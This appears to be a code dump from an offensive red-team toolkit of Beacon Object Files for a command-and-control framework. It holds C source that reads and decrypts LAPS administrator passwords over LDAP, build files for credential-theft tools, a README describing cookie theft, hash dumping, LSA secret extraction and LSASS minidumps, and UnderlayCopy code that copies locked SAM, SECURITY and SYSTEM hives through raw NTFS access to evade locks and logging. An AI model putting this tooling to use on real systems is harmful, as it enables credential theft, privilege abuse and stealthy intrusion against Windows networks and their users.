        BeaconPrintf(CALLBACK_OUTPUT, "[!] This appears to be legacy LAPS (not v2). Password is not encrypted.");
    }

    // Copy the output data before cleaning up LDAP resources
    *length = outval[0]->bv_len;
    *output = (char*)intAlloc(*length + 1);
    if (*output == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Memory allocation failed");
        WLDAP32$ldap_value_free_len(outval);
        if (searchResult != NULL)
            WLDAP32$ldap_msgfree(searchResult);
        WLDAP32$ldap_unbind(ldapHandle);
        return FALSE;
    }
    MSVCRT$memcpy(*output, outval[0]->bv_val, *length);
    (*output)[*length] = '\0'; // Null terminate for safety

    // Clean up LDAP resources
    WLDAP32$ldap_value_free_len(outval);
    if (searchResult != NULL)
        WLDAP32$ldap_msgfree(searchResult);
    WLDAP32$ldap_unbind(ldapHandle);

    return TRUE;
}

// Decryption callback
SECURITY_STATUS WINAPI decryptCallback(
    void* pvCallbackCtxt,
    const BYTE* pbData,
    SIZE_T cbData,
    BOOL isFinal) {

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Decrypted Output: %ls", pbData);
    return 0;
}

// Unprotect secret function
BOOL unprotectSecret(BYTE* protectedData, ULONG protectedDataLength) {
    SECURITY_STATUS error;
    NCRYPT_PROTECT_STREAM_INFO streamInfo;
    NCRYPT_STREAM_HANDLE streamHandle;


    streamInfo.pfnStreamOutput = decryptCallback;
    streamInfo.pvCallbackCtxt = NULL;

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Decrypting secret...");

    if ((error = NCRYPT$NCryptStreamOpenToUnprotect(&streamInfo, NCRYPT_SILENT_FLAG, 0, &streamHandle)) != 0) {
        BeaconPrintf(CALLBACK_ERROR, "[!] NCryptStreamOpenToUnprotect error: %x", error);
        return FALSE;
    }

    if ((error = NCRYPT$NCryptStreamUpdate(streamHandle, protectedData + 16, protectedDataLength - 16, TRUE)) != 0) {
        NCRYPT$NCryptStreamClose(streamHandle);
        BeaconPrintf(CALLBACK_ERROR, "[!] NCryptStreamUpdate error: %x", error);
        return FALSE;
    }

    NCRYPT$NCryptStreamClose(streamHandle);
    return TRUE;
}

void go(char* args, int len) {
    unsigned char* output = NULL;
    int length = 0;
    struct blob_header* header = NULL;
    datap parser;

    char* domainController = NULL;
    char* rootDN = NULL;
    char* searchFilter = NULL;
    int stringSize = 0;
    BOOL isEncrypted = TRUE;


    // Parse arguments
    BeaconDataParse(&parser, args, len);

    domainController = BeaconDataExtract(&parser, NULL);
    if (!domainController || domainController[0] == '\0') {
        BeaconPrintf(CALLBACK_ERROR, "[!] Domain controller is required");
        return;
    }

    rootDN = BeaconDataExtract(&parser, NULL);
    if (!rootDN || rootDN[0] == '\0') {
        BeaconPrintf(CALLBACK_ERROR, "[!] Root DN is required");
        return;
    }

    searchFilter = BeaconDataExtract(&parser, &stringSize);
    if (!searchFilter || searchFilter[0] == '\0' || stringSize == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Search filter is required");
        return;
    }

    char* targetName = BeaconDataExtract(&parser, NULL);
    if (targetName && targetName[0] != '\0') {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Target: %s", targetName);
    }

    if (!searchLdap(domainController, 389, rootDN, searchFilter, (char**)&output, &length, &isEncrypted)) {
        return;
    }

    // If legacy LAPS just print the password
    if (!isEncrypted) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Legacy LAPS Password: %s", (char*)output);
        intFree(output); // Clean up allocated memory
        return;
    }

    // Otherwise it's LAPS v2, parse header and decrypt
    header = (struct blob_header*)output;

    BeaconPrintf(CALLBACK_OUTPUT, "\n[+] LAPSv2 Blob Header Info:");
    BeaconPrintf(CALLBACK_OUTPUT, "    Upper Date Timestamp: %d", header->upperdate);
    BeaconPrintf(CALLBACK_OUTPUT, "    Lower Date Timestamp: %d", header->lowerdate);
    BeaconPrintf(CALLBACK_OUTPUT, "    Encrypted Buffer Size: %d", header->encryptedBufferSize);
    BeaconPrintf(CALLBACK_OUTPUT, "    Flags: %d\n", header->flags);

    if (header->encryptedBufferSize != length - sizeof(struct blob_header)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Header Length (%d) and LDAP Returned Length (%d) Don't Match.. decryption may fail",
                       header->encryptedBufferSize, length - sizeof(struct blob_header));
    }

    if (!unprotectSecret((BYTE*)output, length)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Could not unprotect LAPS creds");
        intFree(output);
        return;
    }

    intFree(output);
}


================================================
FILE: CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
project(ExtensionKit C CXX)

set(CMAKE_C_STANDARD 99)
set(CMAKE_CXX_STANDARD 11)

set(CMAKE_C_COMPILER x86_64-w64-mingw32-gcc)
set(CMAKE_CXX_COMPILER x86_64-w64-mingw32-g++)

include_directories( /usr/x86_64-w64-mingw32/include )

# Main include directory at root level
set(MAIN_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/_include CACHE INTERNAL "Main include directory")

# Additional include directories for specific subprojects
set(KERBEUS_BOF_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/AD-BOF/Kerbeus-BOF/_include CACHE INTERNAL "Kerbeus-BOF include directory")
set(SQL_BOF_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/AD-BOF/SQL-BOF/common CACHE INTERNAL "SQL-BOF include directory")
set(LDAP_BOF_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/AD-BOF/LDAP-BOF/_include CACHE INTERNAL "LDAP-BOF include directory")
set(LDAP_BOF_COMMON_DIR ${CMAKE_CURRENT_SOURCE_DIR}/AD-BOF/LDAP-BOF/src/common CACHE INTERNAL "LDAP-BOF common directory")
set(CREDS_BOF_INCLUDE_DIR ${CMAKE_CURRENT_SOURCE_DIR}/Creds-BOF/_include CACHE INTERNAL "Creds-BOF include directory")

# Add global include directory
include_directories(${MAIN_INCLUDE_DIR})

# Global compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -DBOF")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Os -DBOF")

# Add subdirectories - all will have access to global includes and variables
add_subdirectory(AD-BOF)
add_subdirectory(Creds-BOF)
add_subdirectory(Elevation-BOF)
add_subdirectory(Execution-BOF)
add_subdirectory(Injection-BOF)
add_subdirectory(LateralMovement-BOF)
add_subdirectory(Postex-BOF)
add_subdirectory(Process-BOF)
add_subdirectory(SAL-BOF)
add_subdirectory(SAR-BOF)

# Create a single target that builds all BOF projects
add_custom_target(build-all-bofs
    DEPENDS
        ldapsearch adws_search readlaps badtakeover
        askcreds autologon credman hashdump cookie-monster get-netntlm underlaycopy
        getsystem_token uac_regshellcmd printspoofer uac_sspi DCOMPotato
        execute-assembly
        inject_cfg inject_sec inject_poolparty inject_32to64
        psexec scshell token_make token_steal winrm
        Screenshot addfirewallrule sauroneye
        findmodule findprochandle psc procfreeze
        arp cacls dir env ipconfig listdns netstat nslookup routeprint uptime useridletime whoami
        vulndrivers alwayselevated hijackablepath tokenpriv unattendfiles unquotedsvc
        smartscan nbtscan taskhound quser
    COMMENT "Building all BOF projects"
)

# Clean target for all _bin directories
add_custom_target(clean-all-bins
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/AD-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Creds-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Elevation-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Execution-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Injection-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/LateralMovement-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Postex-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/Process-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/SAL-BOF/_bin
    COMMAND ${CMAKE_COMMAND} -E remove_directory ${CMAKE_CURRENT_SOURCE_DIR}/SAR-BOF/_bin
    COMMENT "Cleaning all _bin directories"
)

message(STATUS "==========================================")
message(STATUS "ExtensionKit Configuration Summary")
message(STATUS "==========================================")
message(STATUS "C Compiler: ${CMAKE_C_COMPILER}")
message(STATUS "CXX Compiler: ${CMAKE_CXX_COMPILER}")
message(STATUS "C Standard: ${CMAKE_C_STANDARD}")
message(STATUS "CXX Standard: ${CMAKE_CXX_STANDARD}")
message(STATUS "Build Type: ${CMAKE_BUILD_TYPE}")
message(STATUS "Main Include Dir: ${MAIN_INCLUDE_DIR}")
message(STATUS "==========================================")


================================================
FILE: Creds-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Creds-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories
include_directories(
    ${CMAKE_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}/_include
#    ${CMAKE_CURRENT_SOURCE_DIR}/UnderlayCopy
)

# Source files
set(ASKCREDS_SOURCES askcreds/askcreds.c)
set(AUTOLOGON_SOURCES autologon/autologon.c)
set(CREDMAN_SOURCES credman/credentialmanager.c)
set(HASHDUMP_SOURCES hashdump/hashdump.c)
set(COOKIE_MONSTER_SOURCES cookie-monster/cookie-monster-bof.c)
set(GET_NETNTLM_SOURCES get-netntlm/get-netntlm.c)
set(UNDERLAYCOPY_SOURCES UnderlayCopy/entry.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -DBOF -w -Wno-int-conversion -Wno-incompatible-pointer-types")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(askcreds OBJECT ${ASKCREDS_SOURCES})
add_library(autologon OBJECT ${AUTOLOGON_SOURCES})
add_library(credman OBJECT ${CREDMAN_SOURCES})
add_library(hashdump OBJECT ${HASHDUMP_SOURCES})
add_library(cookie-monster OBJECT ${COOKIE_MONSTER_SOURCES})
add_library(get-netntlm OBJECT ${GET_NETNTLM_SOURCES})
add_library(underlaycopy OBJECT ${UNDERLAYCOPY_SOURCES})
target_compile_options(underlaycopy PRIVATE -masm=intel)

# Subdirectory (commented out - directory doesn't have CMakeLists.txt)
# add_subdirectory(nanodump)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_askcreds ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:askcreds> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/askcreds.x64.o
    DEPENDS askcreds
    COMMENT "Copying askcreds object file"
)

add_custom_target(copy_autologon ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:autologon> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/autologon.x64.o
    DEPENDS autologon
    COMMENT "Copying autologon object file"
)

add_custom_target(copy_credman ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:credman> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/credman.x64.o
    DEPENDS credman
    COMMENT "Copying credman object file"
)

add_custom_target(copy_hashdump ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:hashdump> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/hashdump.x64.o
    DEPENDS hashdump
    COMMENT "Copying hashdump object file"
)

add_custom_target(copy_cookie-monster ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:cookie-monster> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/cookie-monster-bof.x64.o
    DEPENDS cookie-monster
    COMMENT "Copying cookie-monster object file"
)

add_custom_target(copy_get-netntlm ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:get-netntlm> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/get-netntlm.x64.o
    DEPENDS get-netntlm
    COMMENT "Copying get-netntlm object file"
)

add_custom_target(copy_underlaycopy ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:underlaycopy> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/underlaycopy.x64.o
    DEPENDS underlaycopy
    COMMENT "Copying underlaycopy object file"
)


================================================
FILE: Creds-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof: clean
	# 64-bit builds
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	@($(CC64) $(CFLAGS) askcreds/askcreds.c -o _bin/askcreds.x64.o   && $(STRIP64) _bin/askcreds.x64.o) && echo '[+] askcreds' || echo '[!] askcreds'
	@($(CC64) $(CFLAGS) cookie-monster/cookie-monster-bof.c -o _bin/cookie-monster-bof.x64.o && $(STRIP64) _bin/cookie-monster-bof.x64.o)  && echo '[+] cookie-monster-bof' || echo '[!] cookie-monster-bof'
	@($(CC64) $(CFLAGS) hashdump/hashdump.c -o _bin/hashdump.x64.o && $(STRIP64) _bin/hashdump.x64.o)  && echo '[+] hashdump' || echo '[!] hashdump'
	@($(CC64) $(CFLAGS) get-netntlm/get-netntlm.c -o _bin/get-netntlm.x64.o && $(STRIP64) _bin/get-netntlm.x64.o)  && echo '[+] get-netntlm' || echo '[!] get-netntlm'
	@($(CC64) $(CFLAGS) -masm=intel UnderlayCopy/entry.c -o _bin/underlaycopy.x64.o && $(STRIP64) _bin/underlaycopy.x64.o)  && echo '[+] underlaycopy' || echo '[!] underlaycopy'
	@($(CC64) $(CFLAGS) lsadump/secrets.c -o _bin/lsadump_secrets.x64.o && $(STRIP64) _bin/lsadump_secrets.x64.o) && echo '[+] lsadump-secrets' || echo '[!] lsadump-secrets'
	@($(CC64) $(CFLAGS) lsadump/sam.c -o _bin/lsadump_sam.x64.o && $(STRIP64) _bin/lsadump_sam.x64.o) && echo '[+] lsadump-sam' || echo '[!] lsadump-sam'
	@($(CC64) $(CFLAGS) lsadump/cache.c -o _bin/lsadump_cache.x64.o && $(STRIP64) _bin/lsadump_cache.x64.o) && echo '[+] lsadump-cache' || echo '[!] lsadump-cache'

	# 32-bit builds
	@#($(CC86) $(CFLAGS) askcreds/askcreds.c -o _bin/askcreds.x32.o   && $(STRIP86) _bin/askcreds.x32.o) && echo '[+] askcreds (x32)' || echo '[!] askcreds (x32)'
	@($(CC86) $(CFLAGS) cookie-monster/cookie-monster-bof.c -o _bin/cookie-monster-bof.x32.o && $(STRIP86) _bin/cookie-monster-bof.x32.o)  && echo '[+] cookie-monster-bof (x32)' || echo '[!] cookie-monster-bof (x32)'
	@($(CC86) $(CFLAGS) hashdump/hashdump.c -o _bin/hashdump.x32.o && $(STRIP86) _bin/hashdump.x32.o)  && echo '[+] hashdump (x32)' || echo '[!] hashdump (x32)'
	@($(CC86) $(CFLAGS) get-netntlm/get-netntlm.c -o _bin/get-netntlm.x32.o && $(STRIP86) _bin/get-netntlm.x32.o)  && echo '[+] get-netntlm (x32)' || echo '[!] get-netntlm (x32)'
	@($(CC86) $(CFLAGS) UnderlayCopy/entry.c -o _bin/underlaycopy.x32.o && $(STRIP86) _bin/underlaycopy.x32.o)  && echo '[+] underlaycopy (x32)' || echo '[!] underlaycopy (x32)'
	@#($(CC86) $(CFLAGS) lsadump/secrets.c -o _bin/lsadump_secrets.x32.o && $(STRIP86) _bin/lsadump_secrets.x32.o) && echo '[+] lsadump-secrets' || echo '[!] lsadump-secrets'
	@#($(CC86) $(CFLAGS) lsadump/sam.c -o _bin/lsadump_sam.x32.o && $(STRIP86) _bin/lsadump_sam.x32.o) && echo '[+] lsadump-sam' || echo '[!] lsadump-sam'
	@#($(CC86) $(CFLAGS) lsadump/cache.c -o _bin/lsadump_cache.x32.o && $(STRIP86) _bin/lsadump_cache.x32.o) && echo '[+] lsadump-cache' || echo '[!] lsadump-cache'

	@$(MAKE) --no-print-directory -C nanodump
	@cp nanodump/dist/*.o _bin/

clean:
	@(rm -rf _bin)


================================================
FILE: Creds-BOF/README.md
================================================
# Creds-BOF

BOF tools that can be used to harvest passwords.

![](_img/01.png)



## askcreds

A BOF tool that can be used to collect passwords using CredUIPromptForWindowsCredentialsName.

```
askcreds [-p prompt] [-n note] [-t wait_time]
```



## autologon

Checks the registry for autologon information.

```
autologon
```



## cookie-monster

Steal browser cookies and logins data for edge, chrome and firefox through a BOF! [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Creds-BOF/cookie-monster/README.md)



## credman

Checks the current user's Windows Credential Manager for saved web passwords and returns them.

```
credman
```



### get-netntlm

This is a port of Internal Monologue from https://github.com/GhostPack/Seatbelt. Like Seatbelt, this code will utilize the local SSPI to elict NetNTLM and therefore little to no network traffic will be generated. The `--no-ess` option can be utilized and if you would like the attempt to disable session security in NetNTLMv1

```
get-netntlm [--no-ess]
```



## hashdump

Gathers NTLM hashes from SAM and SYSTEM.

```
hashdump
```

The **Hashdump** item will be added to the **Access** menu in the Sessions Table and Graph.

![](_img/02.png)



## lsadump

BOF tools for dumping LSA secrets, SAM hashes, and cached domain credentials from Windows systems.

### lsadump_secrets

Dumps LSA secrets from the SECURITY registry hive. Extracts and decrypts LSA secrets including default password, DPAPI master keys, service account passwords, auto-logon credentials, and more. Requires SYSTEM privileges.

```
lsadump_secrets
```

### lsadump_sam

Dumps SAM hashes directly from the registry. Extracts NTLM hashes for all local user accounts from the SAM registry hive. Requires admin privileges.

```
lsadump_sam
```

Automatically extracts and adds discovered credentials to Adaptix credentials store.

### lsadump_cache

Dumps cached domain credentials (DCC2/MSCacheV2) from the registry. Extracts cached domain credentials for domain users who have logged on to the system. Requires SYSTEM privileges.

```
lsadump_cache
```

Automatically extracts and adds discovered cached credentials to Adaptix credentials store.



## nanodump

A flexible tool that creates a minidump of the LSASS process. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Creds-BOF/nanodumnp/README.md)



## underlaycopy

A low-level file copy tool that copies files using direct NTFS volume access, bypassing file locks and access restrictions. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Creds-BOF/UnderlayCopy-BOF/README.md)



## Credits
* C2-Tool-Collection - https://github.com/outflanknl/C2-Tool-Collection
* PrivCheck - https://github.com/ostrichgolf/PrivCheck
* nanodump - https://github.com/fortra/nanodump
* Get-NetNTLM - https://github.com/KingOfTheNOPs/Get-NetNTLM
* LSAdump - https://github.com/shashinma/LSAdump-BOF
* UnderlayCopy-BOF - https://github.com/shashinma/UnderlayCopy-BOF

================================================
FILE: Creds-BOF/UnderlayCopy/README.md
================================================
# UnderlayCopy-BOF
> #### Developed for [@Adaptix-Framework](https://github.com/Adaptix-Framework)
<br>

A low-level file copy tool ported to BOF format. Copies files using direct NTFS volume access, bypassing file locks and access restrictions:
- Copy locked files (SAM, SECURITY, SYSTEM registry hives)
- Two copy modes: MFT (Master File Table) and Metadata (FSCTL_GET_RETRIEVAL_POINTERS)
- Direct volume access using NtCreateFile/NtReadFile/NtWriteFile (stealth mode)
- Support for sparse files and data runs
- Save to disk or download to server
- Automatic filename generation for downloads (HOSTNAME_FILENAME.hive format)

```
underlaycopy <mode> <source> [-w destination] [--download]
```

#### Arguments:
- `mode`: Copy mode - `MFT` or `Metadata`
  - `MFT`: Reads file data directly from MFT records and data runs. Best for locked files (SAM, SECURITY, SYSTEM)
  - `Metadata`: Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents. Faster but may fail on locked files
- `source`: Source file path to copy (e.g., `C:\Windows\System32\config\SAM`)
- `-w destination`: Destination file path (required if `--download` is not used)
- `--download`: Download file to server instead of saving to disk. File will be saved as `HOSTNAME_FILENAME.hive` on the server

#### Features:
- **Bypass file locks**: Copy files that are locked by the system (registry hives, active processes)
- **Stealth mode**: Uses low-level NTFS APIs (NtCreateFile, NtReadFile, NtWriteFile) to minimize logging
- **Sparse file support**: Handles sparse clusters correctly (writes zeros for sparse regions)
- **Two copy modes**: 
  - MFT mode: Direct MFT record parsing - works on locked files
  - Metadata mode: Uses Windows API for extent retrieval - faster but requires file handle
- **Memory-efficient**: Uses 64KB buffers for I/O operations
- **Secure cleanup**: Clears sensitive data from memory after operations

#### Examples:
```
# Copy locked SAM registry hive using MFT mode (recommended for locked files)
underlaycopy MFT C:\Windows\System32\config\SAM -w C:\temp\SAM_copy

# Copy file using Metadata mode (faster for unlocked files)
underlaycopy Metadata C:\Windows\System32\notepad.exe -w C:\temp\notepad_copy.exe

# Download locked SECURITY hive to server (saved as HOSTNAME_SECURITY.hive)
underlaycopy MFT C:\Windows\System32\config\SECURITY --download

# Download SYSTEM hive with custom filename
underlaycopy MFT C:\Windows\System32\config\SYSTEM --download -w SYSTEM_backup
```

#### Technical Details:
- **MFT Mode**: 
  - Reads NTFS boot sector to locate MFT
  - Gets file MFT record number from GetFileInformationByHandle
  - Parses MFT record to extract $DATA attribute
  - Reads data runs and copies clusters directly from volume
  - Handles resident data (small files stored in MFT) and non-resident data (data runs)
  
- **Metadata Mode**:
  - Opens source file with FILE_FLAG_BACKUP_SEMANTICS
  - Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents
  - Copies data directly from volume using extent LCNs (Logical Cluster Numbers)
  - May fail on locked files that cannot be opened

- **Volume Access**:
  - Opens volume using NtCreateFile with \??\C: path
  - Reads directly from disk sectors using NtReadFile
  - Bypasses file system locks and access checks

#### Use Cases:
- Extracting locked registry hives (SAM, SECURITY, SYSTEM) for offline analysis
- Copying files locked by active processes
- Stealth file operations without triggering file system logging
- Bypassing access restrictions on system files


================================================
FILE: Creds-BOF/UnderlayCopy/entry.c
================================================
#include <windows.h>
#include <stdint.h>
#include "beacon.h"
#include "bofdefs.h"
#include "adaptix.h"
#include "underlaycopy.h"

// Helper function to normalize path for CreateFileW (\\?\ prefix)
BOOL NormalizePathForCreateFileW(LPCWSTR path, WCHAR* normalizedPath, int bufferSize) {
    if (!path || !normalizedPath || bufferSize < 5) {
        return FALSE;
    }
    
    int pathLen = KERNEL32$lstrlenW(path);
    if (pathLen == 0 || pathLen >= bufferSize - 4) {
        return FALSE;
    }
    
    // Check if already has \\?\ prefix
    if (path[0] == L'\\' && path[1] == L'\\' && path[2] == L'?' && path[3] == L'\\') {
        MSVCRT$memcpy(normalizedPath, path, (pathLen + 1) * sizeof(WCHAR));
    } else {
        normalizedPath[0] = L'\\';
        normalizedPath[1] = L'\\';
        normalizedPath[2] = L'?';
        normalizedPath[3] = L'\\';
        MSVCRT$memcpy(normalizedPath + 4, path, (pathLen + 1) * sizeof(WCHAR));
    }
    
    return TRUE;
}

// Helper function to normalize path for NtCreateFile (\??\ prefix)
BOOL NormalizePathForNtCreateFile(LPCWSTR path, WCHAR* normalizedPath, int bufferSize) {
    if (!path || !normalizedPath || bufferSize < 5) {
        return FALSE;
    }
    
    WCHAR fullDestPath[MAX_PATH * 2];
    WCHAR* filePart = NULL;
    DWORD fullPathLen = KERNEL32$GetFullPathNameW(path, MAX_PATH * 2, fullDestPath, &filePart);
    
    if (fullPathLen == 0 || fullPathLen >= MAX_PATH * 2) {
        fullPathLen = KERNEL32$lstrlenW(path);
        if (fullPathLen >= bufferSize - 4) {
            return FALSE;
        }
        MSVCRT$memcpy(fullDestPath, path, (fullPathLen + 1) * sizeof(WCHAR));
    }
    
    // Check if already has \??\ or \\?\ prefix
    if ((fullDestPath[0] == L'\\' && fullDestPath[1] == L'\\' && fullDestPath[2] == L'?' && fullDestPath[3] == L'\\') ||
        (fullDestPath[0] == L'\\' && fullDestPath[1] == L'?' && fullDestPath[2] == L'?' && fullDestPath[3] == L'\\')) {
        // Already normalized, but convert \\?\ to \??\ if needed
        if (fullDestPath[1] == L'\\') {
            normalizedPath[0] = L'\\';
            normalizedPath[1] = L'?';
            normalizedPath[2] = L'?';
            normalizedPath[3] = L'\\';
            MSVCRT$memcpy(normalizedPath + 4, fullDestPath + 4, (fullPathLen - 3) * sizeof(WCHAR));
        } else {
            if (fullPathLen >= bufferSize) {
                return FALSE;
            }
            MSVCRT$memcpy(normalizedPath, fullDestPath, (fullPathLen + 1) * sizeof(WCHAR));
        }
    } else {
        // Add \??\ prefix
        if (fullPathLen >= bufferSize - 4) {
            return FALSE;
        }
        normalizedPath[0] = L'\\';
        normalizedPath[1] = L'?';
        normalizedPath[2] = L'?';
        normalizedPath[3] = L'\\';
        MSVCRT$memcpy(normalizedPath + 4, fullDestPath, (fullPathLen + 1) * sizeof(WCHAR));
    }
    
    return TRUE;
}

// Helper function to create output file using NtCreateFile
BOOL CreateOutputFileNt(LPCWSTR destPath, HANDLE* hOutput) {
    WCHAR normalizedDestPath[MAX_PATH * 2];
    OBJECT_ATTRIBUTES objAttr;
    UNICODE_STRING outputPath;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    
    if (!NormalizePathForNtCreateFile(destPath, normalizedDestPath, MAX_PATH * 2)) {
        return FALSE;
    }
    
    NTDLL$RtlInitUnicodeString(&outputPath, normalizedDestPath);
    
    objAttr.Length = sizeof(OBJECT_ATTRIBUTES);
    objAttr.RootDirectory = NULL;
    objAttr.ObjectName = &outputPath;
    objAttr.Attributes = OBJ_CASE_INSENSITIVE;
    objAttr.SecurityDescriptor = NULL;
    objAttr.SecurityQualityOfService = NULL;
    
    status = NTDLL$NtCreateFile(
        hOutput,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &objAttr,
        &ioStatus,
        NULL,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OVERWRITE_IF,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL,
        0
    );
    
    return NT_SUCCESS(status);
}

// Common I/O functions to reduce code duplication

// Write sparse data to file
BOOL WriteSparseToFile(HANDLE hOutput, ULONGLONG offset, ULONGLONG size, BYTE* tempBuffer) {
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    
    MSVCRT$memset(tempBuffer, 0, (size_t)size);
    
    LARGE_INTEGER writeOffset;
    writeOffset.QuadPart = offset;
    
    status = NTDLL$NtWriteFile(
        hOutput,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        tempBuffer,
        (ULONG)size,
        &writeOffset,
        NULL
    );
    
    if (!NT_SUCCESS(status)) {
        return FALSE;
    }
    
    // Note: bytesWritten is updated in caller using size parameter
    return TRUE;
}

// Write sparse data to memory
void WriteSparseToMemory(BYTE* destBuffer, ULONGLONG offset, ULONGLONG size) {
    MSVCRT$memset(destBuffer + offset, 0, (size_t)size);
}

// Copy chunk from volume to file
BOOL CopyChunkToFile(HANDLE hVolume, HANDLE hOutput, ULONGLONG diskOffset, ULONGLONG toCopy, ULONGLONG writeOffset, BYTE* buffer, DWORD bufferSize, ULONGLONG* bytesWritten) {
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    ULONGLONG copied = 0;
    
    *bytesWritten = 0;
    
    while (copied < toCopy) {
        ULONG chunkSize = (ULONG)((toCopy - copied > bufferSize) ? bufferSize : (toCopy - copied));
        
        LARGE_INTEGER readOffset;
        readOffset.QuadPart = diskOffset + copied;
        
        status = NTDLL$NtReadFile(
            hVolume,
            NULL,
            NULL,
            NULL,
            &ioStatus,
            buffer,
            chunkSize,
            &readOffset,
            NULL
        );
        
        if (!NT_SUCCESS(status)) {
            return FALSE;
        }
        
        if (ioStatus.Information == 0) {
            return FALSE;
        }
        
        LARGE_INTEGER writeOffsetLarge;
        writeOffsetLarge.QuadPart = writeOffset + copied;
        
        status = NTDLL$NtWriteFile(
            hOutput,
            NULL,
            NULL,
            NULL,
            &ioStatus,
            buffer,
            (ULONG)ioStatus.Information,
            &writeOffsetLarge,
            NULL
        );
        
        if (!NT_SUCCESS(status)) {
            return FALSE;
        }
        
        copied += ioStatus.Information;
        MSVCRT$memset(buffer, 0, bufferSize);
    }
    
    *bytesWritten = copied;
    return TRUE;
}

// Copy chunk from volume to memory
BOOL CopyChunkToMemory(HANDLE hVolume, BYTE* destBuffer, ULONGLONG destOffset, ULONGLONG diskOffset, ULONGLONG toCopy, BYTE* readBuffer, DWORD bufferSize, ULONGLONG* bytesCopied) {
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    ULONGLONG copied = 0;
    
    *bytesCopied = 0;
    
    while (copied < toCopy) {
        ULONG chunkSize = (ULONG)((toCopy - copied > bufferSize) ? bufferSize : (toCopy - copied));
        
        LARGE_INTEGER readOffset;
        readOffset.QuadPart = diskOffset + copied;
        
        status = NTDLL$NtReadFile(
            hVolume,
            NULL,
            NULL,
            NULL,
            &ioStatus,
            readBuffer,
            chunkSize,
            &readOffset,
            NULL
        );
        
        if (!NT_SUCCESS(status)) {
            return FALSE;
        }
        
        if (ioStatus.Information == 0) {
            return FALSE;
        }
        
        MSVCRT$memcpy(destBuffer + destOffset + copied, readBuffer, (size_t)ioStatus.Information);
        copied += ioStatus.Information;
        MSVCRT$memset(readBuffer, 0, bufferSize);
    }
    
    *bytesCopied = copied;
    return TRUE;
}

// Copy file by extents directly to memory buffer (for Metadata mode download)
